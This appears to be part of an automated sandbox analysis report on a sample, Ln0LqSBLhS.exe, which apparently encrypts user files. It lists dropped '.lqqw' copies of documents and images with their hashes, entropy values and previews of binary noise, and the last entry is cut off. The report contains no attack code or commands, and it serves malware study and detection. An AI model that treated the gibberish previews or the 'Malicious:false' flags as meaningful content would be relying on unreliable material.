                                                                                                                                                                                                    SHA-256:8B5DC1FB36F17D0EC2E745977288E827853A47AD96214C6954BAA046B4B7FF8C
                                                                                                                                                                                                    SHA-512:D71E448230D97C21888C5D03388AB04ADC8D31F0D224A022C3F178B3B9B867A3F7B5F477A69998DABF290B04A89028C57ECD950D2CA5644873DE7900AF288DDB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....N..b..5.\L.2.n....:.Hrm..f.t<F.... ..C..\..L.....*...J...w?..n#...J0........]..)p5F..e.z.j...0.....|...L....+R...mA.+...A..r.....e.&C.\.8.0....3..M..Fq.\Zo,..........Y:.K.\.Y.)2..|...X./.<..y.Y..yi7..kC......b............(.g...A.....0X,."+l...5W.&...."W&...g%.....u.R..ox............p..K..z..b.....<../"k.:wS..Z.}l...........~p........E...Et.o.FY.=F...e....x.R.I!T."=.G;a..9.r..b.lT...}#.......1 q..2.{........!d?..D.k...V.1...b.]R.*G#.3..Z.Uo.G.._.<.7..iD.-.....o.t\.]?..l.>.c..>.eT.2.....1.Zt.E.p$.=g.F.=.0v.7...fn.p[.<...]p]TN..0..4L.=w..?_j..x.!Be...=..*......j.),%R.je.p.....e..)UY.N.P...W.?.;.6.....N.a[b....0....q..........1.D...Sar8C.@.on.;l..t..t>.C$..#.U.q^.B?...v..{2.|...Z...a...5^.&.VX..n$........{..=....=....m.......<..s.....r.'.|0ctEq.p......p...i,..i.w. .2C.......YU.rx..V`...[w.Ckz..@i..g.i....2...;.$.8\.<a.d.x_~......[......q..N..2....R.mR.cO....U_.v?L~QYO..s....r.>=.c(r.[B.NGF..E.@)N.......^.....,~?y.>.~Ij.*.u...zt..
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\EIVQSAOTAQ.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.851169720136913
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YqjR8KZ4rs29/O+HcIVKbPncC6jQTkCrXBFfA5aEI5Zi38wbD:NjR8k4BW+PVaAD6fcJIOPD
                                                                                                                                                                                                    MD5:A6BFA2957DA6C7B218B327A64D1C5BB6
                                                                                                                                                                                                    SHA1:58203BA615918D430674066914D4804072ADB0CB
                                                                                                                                                                                                    SHA-256:87F4CE2E7E1A915A72F52AAA7FEB9D6B5615E3A9839CB9E38676C4CD4416C848
                                                                                                                                                                                                    SHA-512:78C26A565F33D48AF0AA734FEEA895DA1EDAF5288D44DCAFFFE376BB6C71F86AA3E0AF22944751CB61AF4171CB7843DA96CABABCD3967443B28E123F040E5600
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .0.I.....Hf.YV7..W~.f..t......3[....s.....N...8.a...rhw....C.!.....d...v..6.....%Zx.k...0e.....N.......d.p..My..F../.........?tn.v..5k..:.e|/...S..[.<..A'lFl..2.`J.Y+@..R...#. S.^.`.(S......x.........1cO....E.,w..u....#f......../...Vw.YqA..<U.......@=b.`......?......t.kq7.H...t...../......BNr._....k..Y#x5|.[..q.a....f..GD!{E..........j.c^....d_0k....h.$..S.gWi. UV.K.......Bj....V.DQ.. .0^...Y....4.G.,.V..(..4.@...e7...u..........6=h2.b@Uhr.=.*.S.D.Z...2_2.3..A..oo...w.*v$...................5.B}..%.)...P...$......./\.....m.L.K;.8..{...U.....N._XW..|v.1J..~...L..U..{Y....d...V..cAYz..V...b.b.q.{.je.pk......f:..!C..p..y.Oc>.pAt...f.g..U].<...1.2*m....7>.q.y8F.<Z}.,...vk...*...Nv./.&.(bW3......F..C..{....~.7......?.....e......pM.=..X.N!..S..k...X...&.q..bz..\Pj$..W....y..l<..c.{0...iP.4..aD..8[......ct.M.T. ...b..............X."k)xpI..%../................p.Q....%MMP.....s.....Av..?W...T...$LO1h.1[..+....`%.....~h....B7.!".....3.^.T.?.mY.|Ex
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\EIVQSAOTAQ.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.851169720136913
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YqjR8KZ4rs29/O+HcIVKbPncC6jQTkCrXBFfA5aEI5Zi38wbD:NjR8k4BW+PVaAD6fcJIOPD
                                                                                                                                                                                                    MD5:A6BFA2957DA6C7B218B327A64D1C5BB6
                                                                                                                                                                                                    SHA1:58203BA615918D430674066914D4804072ADB0CB
                                                                                                                                                                                                    SHA-256:87F4CE2E7E1A915A72F52AAA7FEB9D6B5615E3A9839CB9E38676C4CD4416C848
                                                                                                                                                                                                    SHA-512:78C26A565F33D48AF0AA734FEEA895DA1EDAF5288D44DCAFFFE376BB6C71F86AA3E0AF22944751CB61AF4171CB7843DA96CABABCD3967443B28E123F040E5600
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .0.I.....Hf.YV7..W~.f..t......3[....s.....N...8.a...rhw....C.!.....d...v..6.....%Zx.k...0e.....N.......d.p..My..F../.........?tn.v..5k..:.e|/...S..[.<..A'lFl..2.`J.Y+@..R...#. S.^.`.(S......x.........1cO....E.,w..u....#f......../...Vw.YqA..<U.......@=b.`......?......t.kq7.H...t...../......BNr._....k..Y#x5|.[..q.a....f..GD!{E..........j.c^....d_0k....h.$..S.gWi. UV.K.......Bj....V.DQ.. .0^...Y....4.G.,.V..(..4.@...e7...u..........6=h2.b@Uhr.=.*.S.D.Z...2_2.3..A..oo...w.*v$...................5.B}..%.)...P...$......./\.....m.L.K;.8..{...U.....N._XW..|v.1J..~...L..U..{Y....d...V..cAYz..V...b.b.q.{.je.pk......f:..!C..p..y.Oc>.pAt...f.g..U].<...1.2*m....7>.q.y8F.<Z}.,...vk...*...Nv./.&.(bW3......F..C..{....~.7......?.....e......pM.=..X.N!..S..k...X...&.q..bz..\Pj$..W....y..l<..c.{0...iP.4..aD..8[......ct.M.T. ...b..............X."k)xpI..%../................p.Q....%MMP.....s.....Av..?W...T...$LO1h.1[..+....`%.....~h....B7.!".....3.^.T.?.mY.|Ex
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\EOWRVPQCCS.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.849425090622533
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:bsZhMRNgNKuab38ukhBW3SPDb2UbCKBOMadIqyuh0BpQ5yc/FB3ADbD:bsZhceKDQrSSP24njadIJjQRP3yD
                                                                                                                                                                                                    MD5:C65DCBD09B8BF63C42AF521B94F6E66C
                                                                                                                                                                                                    SHA1:ABBBC20EBB6BB8BAB73169F5DAEED0FD6E1653BE
                                                                                                                                                                                                    SHA-256:F1435C71EE7A18B4FE8E0978DA10D3A2F1A59972DE4B1294E61703DCAA693F23
                                                                                                                                                                                                    SHA-512:F82253FDC1AB9EC5AB54C8D11C59D1A23DDF32E1E2A4BBE6A46DAFA0A7E2FB811AC247961DF07CE1E23FEF94A1EDDBB264920321F14F68CB5DA06B752657B6A4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ._.....VX...#...9...).&ej..O...*.k.=..)d.a.2...$h.2..*.+q?(5..{....<..5..H-)3.Yf.Y....M8..O...e#.J&U ..,*...!'..=r|:.,h.....BpP....).[A.....To...OI...z.&N..-V6.P#OX....vz.=.c-.ER=3i5C.".x.V....R........WQ.{M@..........h...,.v;MPt.2.hM.pd+.@..q....(...'....7G../.i..1.6.;}..9..)...gr].H.m5..n....J...o..8.2..3.#..xi....1)...G{.C..q...&.W.Eq.G...u.<5.....OU<....N..hR......f"e/.y.>..Z0...0.Q.vb..@_..|......N..N...8.(......(....c......F....:`..n..N.G.....vR.@.D.5..[.-..9........`.6.&........K.........;.......]#*O=$.A..S.A.;.!.w........zZ..%.....(t.|[.|^g.y.[..),.G.%.F7...o8L...TaoN..;.].C]nyx.?.=.......Z\W..OZ...:..;..B...R.}.1.Y..Ua."..S.dG.&.w..W.W....hx")6..J...."!....t]....M.G..2/<W).........xu...%.M..I.ea6q.....~S.$/....f;...N..w+..G)I..c.y.)...Y......2.x.d.F..2.F.h/1-...+?..B..KS8.|...{.]$...k.......\.6...#..... ......3.%.s....y.F\..X.4.v ...e.$e"N.@.q....b...............k.....=.vE.].+{.r.b..8...$1.........fd0..'...|..+.uf...%..f].
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\EOWRVPQCCS.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.849425090622533
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:bsZhMRNgNKuab38ukhBW3SPDb2UbCKBOMadIqyuh0BpQ5yc/FB3ADbD:bsZhceKDQrSSP24njadIJjQRP3yD
                                                                                                                                                                                                    MD5:C65DCBD09B8BF63C42AF521B94F6E66C
                                                                                                                                                                                                    SHA1:ABBBC20EBB6BB8BAB73169F5DAEED0FD6E1653BE
                                                                                                                                                                                                    SHA-256:F1435C71EE7A18B4FE8E0978DA10D3A2F1A59972DE4B1294E61703DCAA693F23
                                                                                                                                                                                                    SHA-512:F82253FDC1AB9EC5AB54C8D11C59D1A23DDF32E1E2A4BBE6A46DAFA0A7E2FB811AC247961DF07CE1E23FEF94A1EDDBB264920321F14F68CB5DA06B752657B6A4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ._.....VX...#...9...).&ej..O...*.k.=..)d.a.2...$h.2..*.+q?(5..{....<..5..H-)3.Yf.Y....M8..O...e#.J&U ..,*...!'..=r|:.,h.....BpP....).[A.....To...OI...z.&N..-V6.P#OX....vz.=.c-.ER=3i5C.".x.V....R........WQ.{M@..........h...,.v;MPt.2.hM.pd+.@..q....(...'....7G../.i..1.6.;}..9..)...gr].H.m5..n....J...o..8.2..3.#..xi....1)...G{.C..q...&.W.Eq.G...u.<5.....OU<....N..hR......f"e/.y.>..Z0...0.Q.vb..@_..|......N..N...8.(......(....c......F....:`..n..N.G.....vR.@.D.5..[.-..9........`.6.&........K.........;.......]#*O=$.A..S.A.;.!.w........zZ..%.....(t.|[.|^g.y.[..),.G.%.F7...o8L...TaoN..;.].C]nyx.?.=.......Z\W..OZ...:..;..B...R.}.1.Y..Ua."..S.dG.&.w..W.W....hx")6..J...."!....t]....M.G..2/<W).........xu...%.M..I.ea6q.....~S.$/....f;...N..w+..G)I..c.y.)...Y......2.x.d.F..2.F.h/1-...+?..B..KS8.|...{.]$...k.......\.6...#..... ......3.%.s....y.F\..X.4.v ...e.$e"N.@.q....b...............k.....=.vE.].+{.r.b..8...$1.........fd0..'...|..+.uf...%..f].
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\PALRGUCVEH.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.840860576400893
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:QXV3jLKzccDiVP0vAlYa3sPzlG8GrJITpPG9OMVel3nhjta3kbD:QXV3brR0v6YMexGtr+BdU63nXQuD
                                                                                                                                                                                                    MD5:8618344BE3C8FD4631C0258C6FBC7C78
                                                                                                                                                                                                    SHA1:FCCF1984396179C508EF34A020505BEFCD92454A
                                                                                                                                                                                                    SHA-256:D5A6B153AA5347096C42A8A6B331E5E213E6E571B839E12B4DDEA6CDA9C8B844
                                                                                                                                                                                                    SHA-512:15795F2EEAC0613DFEBCE6044881D044462DAA65ECCF1D25FAC0C8D70487E18499FF76BA138F7AB6ADF7E94AE9538234BDAC8C49D047367984F237BF2C5C6198
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .4..a.u...".....X.d..sf..-...ZU.K..R.p.H?<T..t.r.........m............r..>.H.....!.(..#j...Au2+......].GR$#...`J.|x...x.F}~Qw._0.M.Z.2~0.......I..UM..S):..D.&...<...tz...N.g..{S....k.|.A....N<...).....X.M0..TV.Q.=>Xm..(C.|...=Y..N.6......9.u..B..1et.B..z...z....x.......^.E.sk..c..?..:.........$$dV`vE...._.F.>..A.....yZ+>b.~.....BX..v.l..i.............k.....O.%R......,....m.z.{.oK....[..e......6V..=.1.Y.o.Oi....q.m....B<....i....i.C..e..:e...K.L.<V..$.5u2T...."..WxuC. {I&jv6.J..B ..^^g.....j.zQ...E.i.W...N)............}..b-l.v.q....]T...t....y..8.....H...M...??....f.....$.......x....Y......*...;.{g=H.&.M.f.z..A.I.n.......j#.*.h.\.s..*".....O.q.4...~.....r$n......O....L..\...S>....6..b.qh.f<{....&..........nm]...Fp.-.{....4f@..K3.$e.?._.3..x..&3L...S7....R...s[k.Ek.:G..;./.&....4..<.D..Xp.!|!.S.&..1d..>.y...h.....}..<P3.._Aj.!.{.T=M/..0,.;.!#9.O+.c...2..,......-9.A..........)D..Nz....Oy.........g6...|...Z!.Q..=......N7...9."..g.......2b.R...P....
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\PALRGUCVEH.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.840860576400893
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:QXV3jLKzccDiVP0vAlYa3sPzlG8GrJITpPG9OMVel3nhjta3kbD:QXV3brR0v6YMexGtr+BdU63nXQuD
                                                                                                                                                                                                    MD5:8618344BE3C8FD4631C0258C6FBC7C78
                                                                                                                                                                                                    SHA1:FCCF1984396179C508EF34A020505BEFCD92454A
                                                                                                                                                                                                    SHA-256:D5A6B153AA5347096C42A8A6B331E5E213E6E571B839E12B4DDEA6CDA9C8B844
                                                                                                                                                                                                    SHA-512:15795F2EEAC0613DFEBCE6044881D044462DAA65ECCF1D25FAC0C8D70487E18499FF76BA138F7AB6ADF7E94AE9538234BDAC8C49D047367984F237BF2C5C6198
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .4..a.u...".....X.d..sf..-...ZU.K..R.p.H?<T..t.r.........m............r..>.H.....!.(..#j...Au2+......].GR$#...`J.|x...x.F}~Qw._0.M.Z.2~0.......I..UM..S):..D.&...<...tz...N.g..{S....k.|.A....N<...).....X.M0..TV.Q.=>Xm..(C.|...=Y..N.6......9.u..B..1et.B..z...z....x.......^.E.sk..c..?..:.........$$dV`vE...._.F.>..A.....yZ+>b.~.....BX..v.l..i.............k.....O.%R......,....m.z.{.oK....[..e......6V..=.1.Y.o.Oi....q.m....B<....i....i.C..e..:e...K.L.<V..$.5u2T...."..WxuC. {I&jv6.J..B ..^^g.....j.zQ...E.i.W...N)............}..b-l.v.q....]T...t....y..8.....H...M...??....f.....$.......x....Y......*...;.{g=H.&.M.f.z..A.I.n.......j#.*.h.\.s..*".....O.q.4...~.....r$n......O....L..\...S>....6..b.qh.f<{....&..........nm]...Fp.-.{....4f@..K3.$e.?._.3..x..&3L...S7....R...s[k.Ek.:G..;./.&....4..<.D..Xp.!|!.S.&..1d..>.y...h.....}..<P3.._Aj.!.{.T=M/..0,.;.!#9.O+.c...2..,......-9.A..........)D..Nz....Oy.........g6...|...Z!.Q..=......N7...9."..g.......2b.R...P....
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\ZGGKNSUKOP.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.855662618214979
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:MVPwuvuz5t0riE1wIMXSeoscnNA8KADkv8ZNu4HF6fXrV+tts7UeFSK8QDJbD:MVPwuWzAruIMIsKNHJD2Gu4kfbkjs7/T
                                                                                                                                                                                                    MD5:0903D15A8BF3AE382DE4E4A36E9D7F1F
                                                                                                                                                                                                    SHA1:5CC2CB26C63838D0B6FE01399AAAE912D1F38AF6
                                                                                                                                                                                                    SHA-256:C14B8D1C3E287292AA9BD3FF7EAEAEF7789A0438A19C820B3BF4B674081938CE
                                                                                                                                                                                                    SHA-512:DB3619C87B14499DFDDAEB566B449DBBFCEA26B7F30A3BDF2D554424A982E9B7DF22DFE50B13E3B23D056FA25B0807E2E4F0A535459F9D9A94E74DE04BED51EC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: =.1s\.G...+>....uxO.8.[I.s..*.s..C.!./....m........M....g.+.i.h.}VjFY...j..y..!.. )...X._V.....]......V...r.*^z.:Q.=b....V`..Fg3'.<....g..9].. ...v..Q.C.1x.z.R.x.Vvg.1.b.....;..G..x?6..yj..X*.....-H.]'.M..h9../g,.~dA.:.lA.$M)!.#}r...L..7j...oa.|4...@6=.....[.;...!X%...^l..i7.[..~kw...$.$s}.U..).2.vD........J<.j.5}.M5.I>/..{......S....-..._.y>#mat..<`.5]..6.-...1w...L..[..e..rf...oR..a..V..d..-..a".-..N...yX.r.mw...<........+~.eV*.......L........Q.tT.t..N.d..+z....e...T.t"8.\45..l.....J. .>...)n..2.tZ.n...2.N.!..l.:.m.|..wE..3....|.i.].....:..Zm.q.E.x..Z.M...x.i.@..5.....O..m@"B.d.m.&..N..>.)+z.........$.C.....4[.e..U;i...Y.....X.fW..zK...*aA.@...2t.|................. ....#*...|/.......}........k..K.d....*k+".._.i...... .'...lX...X..H=c..dB%>.P......g|%..x.:.L.p.AY.3..e..>......X...Je..x..N...B....u.....gSGt.d..x.#......S....J.LO[.]..}...M.*....e.2. p?.h0.7Q.?.)..Byp.Q.$?...{.n.*6.."...=..4...w...f....O&.Q.y..8.o...[Z/...;p;.FW.|..*...F.d
                                                                                                                                                                                                    C:\Users\user\Desktop\BJZFPPWAPT\ZGGKNSUKOP.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.855662618214979
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:MVPwuvuz5t0riE1wIMXSeoscnNA8KADkv8ZNu4HF6fXrV+tts7UeFSK8QDJbD:MVPwuWzAruIMIsKNHJD2Gu4kfbkjs7/T
                                                                                                                                                                                                    MD5:0903D15A8BF3AE382DE4E4A36E9D7F1F
                                                                                                                                                                                                    SHA1:5CC2CB26C63838D0B6FE01399AAAE912D1F38AF6
                                                                                                                                                                                                    SHA-256:C14B8D1C3E287292AA9BD3FF7EAEAEF7789A0438A19C820B3BF4B674081938CE
                                                                                                                                                                                                    SHA-512:DB3619C87B14499DFDDAEB566B449DBBFCEA26B7F30A3BDF2D554424A982E9B7DF22DFE50B13E3B23D056FA25B0807E2E4F0A535459F9D9A94E74DE04BED51EC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: =.1s\.G...+>....uxO.8.[I.s..*.s..C.!./....m........M....g.+.i.h.}VjFY...j..y..!.. )...X._V.....]......V...r.*^z.:Q.=b....V`..Fg3'.<....g..9].. ...v..Q.C.1x.z.R.x.Vvg.1.b.....;..G..x?6..yj..X*.....-H.]'.M..h9../g,.~dA.:.lA.$M)!.#}r...L..7j...oa.|4...@6=.....[.;...!X%...^l..i7.[..~kw...$.$s}.U..).2.vD........J<.j.5}.M5.I>/..{......S....-..._.y>#mat..<`.5]..6.-...1w...L..[..e..rf...oR..a..V..d..-..a".-..N...yX.r.mw...<........+~.eV*.......L........Q.tT.t..N.d..+z....e...T.t"8.\45..l.....J. .>...)n..2.tZ.n...2.N.!..l.:.m.|..wE..3....|.i.].....:..Zm.q.E.x..Z.M...x.i.@..5.....O..m@"B.d.m.&..N..>.)+z.........$.C.....4[.e..U;i...Y.....X.fW..zK...*aA.@...2t.|................. ....#*...|/.......}........k..K.d....*k+".._.i...... .'...lX...X..H=c..dB%>.P......g|%..x.:.L.p.AY.3..e..>......X...Je..x..N...B....u.....gSGt.d..x.#......S....J.LO[.]..}...M.*....e.2. p?.h0.7Q.?.)..Byp.Q.$?...{.n.*6.."...=..4...w...f....O&.Q.y..8.o...[Z/...;p;.FW.|..*...F.d
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847861655242958
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KX5wbY5rnm6GkJZrzASojquoe/JXljZpTJOcfViDaGznO6W6iNBc3GE8DDPbD:KX50Y5rm6GkrPAdq8njTAeViDaGznO60
                                                                                                                                                                                                    MD5:0153374112305003251212F7449935D2
                                                                                                                                                                                                    SHA1:16100EFF8BA30E92E446F829E5C0F152448E7BBA
                                                                                                                                                                                                    SHA-256:5AB890DB9AC506AC1A5F9FB9C3F61D82863FACC82FE44916BFB86E26AF6C16C0
                                                                                                                                                                                                    SHA-512:16A6E5451E4FF7615E8E1C4A8D59409B28E5A432CCF852A5E6D4608F9091B4ACD285E26E813FA66E66BE8E2598EE568495B2A1D1999F64CCC2A592289D9FDE39
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /.0..Mr...^.B....?.....L-...Qx...+0U..q...<g.<.&.N..@zK|qi.V.f..;n.x.;3.9w...t....Z.2.y...36..M.R.s..O....e.G.h..3.y.U....s..GB[..,..R...I...;h.#:.....q.....yU.9.*{...N.....x....]}...K.d.{r......v.......S...o.J..]..|.>...NM$.11..5."B0k...$.......T......].U+._..Z1...^..w..o.Y..D.....-.0D....C.....j.Y...8E........_.R.hk.....Y!q..Z.......=.-.+.&=.-...fE.fn....~H5@...ehR.bGcs..A.."O..Nu./...h..)..q...7.d.p..N..}R[...C.6Z...p..o5.....>3.U(..t...6Rp....i%.....;.....&_.D.._...q!.C..........m.....(4.iL*...R.O...Yd.l.....a.!.c%.8...#..t6Y....su...Ke....K3..)SZ..[N..........l5.....n..*......P+l...-&....=.Ts".."9.7..V...d.nDw.g.D....k.s....?0w.V.d.a{..V]a.,.x./.L...H.?.y=@....xq#..*..4...%....... ..k.J..9w.!D'.Q....,..%H...~'....g.1..g...L...xT...Q/.>...F[.I.;.>.?....jT....Q..Z..)n..B.D...;.I...=.R.'...L...s.-.. ....h..M....p.b...F.....W....V.. .%ZLZ...T...a.......q...7Z"...)&...'....$....5......a..X.'"....p.J....ND...c.....F."..:.%..j<..S.l. .~..
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847861655242958
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:KX5wbY5rnm6GkJZrzASojquoe/JXljZpTJOcfViDaGznO6W6iNBc3GE8DDPbD:KX50Y5rm6GkrPAdq8njTAeViDaGznO60
                                                                                                                                                                                                    MD5:0153374112305003251212F7449935D2
                                                                                                                                                                                                    SHA1:16100EFF8BA30E92E446F829E5C0F152448E7BBA
                                                                                                                                                                                                    SHA-256:5AB890DB9AC506AC1A5F9FB9C3F61D82863FACC82FE44916BFB86E26AF6C16C0
                                                                                                                                                                                                    SHA-512:16A6E5451E4FF7615E8E1C4A8D59409B28E5A432CCF852A5E6D4608F9091B4ACD285E26E813FA66E66BE8E2598EE568495B2A1D1999F64CCC2A592289D9FDE39
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: /.0..Mr...^.B....?.....L-...Qx...+0U..q...<g.<.&.N..@zK|qi.V.f..;n.x.;3.9w...t....Z.2.y...36..M.R.s..O....e.G.h..3.y.U....s..GB[..,..R...I...;h.#:.....q.....yU.9.*{...N.....x....]}...K.d.{r......v.......S...o.J..]..|.>...NM$.11..5."B0k...$.......T......].U+._..Z1...^..w..o.Y..D.....-.0D....C.....j.Y...8E........_.R.hk.....Y!q..Z.......=.-.+.&=.-...fE.fn....~H5@...ehR.bGcs..A.."O..Nu./...h..)..q...7.d.p..N..}R[...C.6Z...p..o5.....>3.U(..t...6Rp....i%.....;.....&_.D.._...q!.C..........m.....(4.iL*...R.O...Yd.l.....a.!.c%.8...#..t6Y....su...Ke....K3..)SZ..[N..........l5.....n..*......P+l...-&....=.Ts".."9.7..V...d.nDw.g.D....k.s....?0w.V.d.a{..V]a.,.x./.L...H.?.y=@....xq#..*..4...%....... ..k.J..9w.!D'.Q....,..%H...~'....g.1..g...L...xT...Q/.>...F[.I.;.>.?....jT....Q..Z..)n..B.D...;.I...=.R.'...L...s.-.. ....h..M....p.b...F.....W....V.. .%ZLZ...T...a.......q...7Z"...)&...'....$....5......a..X.'"....p.J....ND...c.....F."..:.%..j<..S.l. .~..
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.81949183560304
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:gcqaR6vvRwjRlF7s6jy44SVcAf80OgUyVTmwuEaN0K8KDYn+DJCpPfbD:g1aR6vKdlFm4PXApyVq28JCBD
                                                                                                                                                                                                    MD5:81AC590BA78CE4503BC32D9D9EB8ED13
                                                                                                                                                                                                    SHA1:2891A606547EF81F2A7B5C9D93D087D04F1D4AEE
                                                                                                                                                                                                    SHA-256:0315B2FFB89EE7E789D33F09717443B0F43A6132A8457F81E0BAB79FD81A14E6
                                                                                                                                                                                                    SHA-512:27A845D5F9D7950A7EECAFCEAEE58BD84B4C60AFC768A017A002A85C176E1614EBA17A2F5176E713D05B71767D1DB356F40559918D6CF04DA19D3C000CEB33DF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: c......s..E.M..K....2."%vC:.h."...... ....q..I....='k'..%.........<^.O...}2.PA...w..K9..w}....u{.+...uX..7.?.(~v.......&~.?b....!O..}..h.h..._....{...MG.$.z9.:....T4x..M..;`a%.=.Q.~s......<...2.1.{%C.....)A.....5..u.f.K...o..%>..+..v.1...|..%..]M$...U.cYB.)..e.N..4..|X.........%..."S.......5.......3o..<..hN..#....<C.3:..o...x.n2....z|....?w..?."...S.....D..O..q.v...L.. ..b}:.s"..{.O.y..c.v......E....]. ..4..D...A...{.....(.#z.;-1<...{.,...9....'..U\....]k....b...V....VH(.>....(.9.B.MZ.....2...*v.K.MV.%.....}{.....:........2..vd."..S..D.J..%:.*.b.:D...C_..TJ.....z.r.[*......i.....*.....(..}5.JU.v.=.Ho.X..!.(....P.U.*..D...^.....4_f.Z.B.*...4.A..S.....T...y......u..=_.......T|....6'...V..J.gSnnE.T.-..|."..PP{_..?....x.l...E.'p.......8.....M...R.;...9.,b..M.....h.*..m2....*....m..j;.o.Upn.zO..^..>I$|.v.N.#"i...QnK...+y........f....Y.AP...F1.|..+.{p!6..Sd....D....W.#...k..40......hd.n.......rI.p.B#.Y....h.....G>..v.`....q..".
                                                                                                                                                                                                    C:\Users\user\Desktop\DUUDTUBZFW.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.81949183560304
                                                                                                                                                                                                    Encrypted:false
